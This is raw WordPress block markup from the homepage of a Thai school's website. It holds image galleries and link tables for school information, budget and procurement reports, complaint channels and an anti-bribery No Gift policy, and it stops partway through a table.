{\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy 